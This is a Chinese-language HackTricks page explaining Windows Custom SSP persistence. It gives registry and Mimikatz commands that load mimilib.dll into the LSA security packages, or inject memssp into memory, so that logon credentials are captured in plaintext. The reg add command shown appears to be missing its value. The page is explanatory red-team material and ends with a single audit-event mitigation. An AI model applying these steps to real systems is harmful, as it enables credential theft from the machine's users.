Custom SSP

学习和实践 AWS 黑客技术：HackTricks 培训 AWS 红队专家 (ARTE) 学习和实践 GCP 黑客技术：HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 分享黑客技巧。

Custom SSP

在这里了解什么是 SSP（安全支持提供者）。您可以创建您 自己的 SSP 来捕获用于访问机器的凭据的明文。

Mimilib

您可以使用 Mimikatz 提供的 mimilib.dll 二进制文件。这将把所有凭据以明文记录在一个文件中。 将 dll 放入 C:\Windows\System32\ 获取现有 LSA 安全包的列表：

attacker@target

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

将 mimilib.dll 添加到安全支持提供程序列表（安全包）：

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

并且在重启后，所有凭据可以在 C:\Windows\System32\kiwissp.log 中以明文形式找到。

在内存中

您还可以直接使用 Mimikatz 将其注入内存中（请注意，这可能会有点不稳定/无法工作）：

privilege::debug
misc::memssp

这不会在重启后存活。

缓解措施

事件 ID 4657 - 审计创建/更改 HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages

学习和实践 AWS 黑客技术：HackTricks 培训 AWS 红队专家 (ARTE) 学习和实践 GCP 黑客技术：HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 电报群组 或在 Twitter 🐦 @hacktricks_live** 上关注我们。**
通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享黑客技巧。

PreviousConstrained Delegation NextDCShadow

Last updated 1 month ago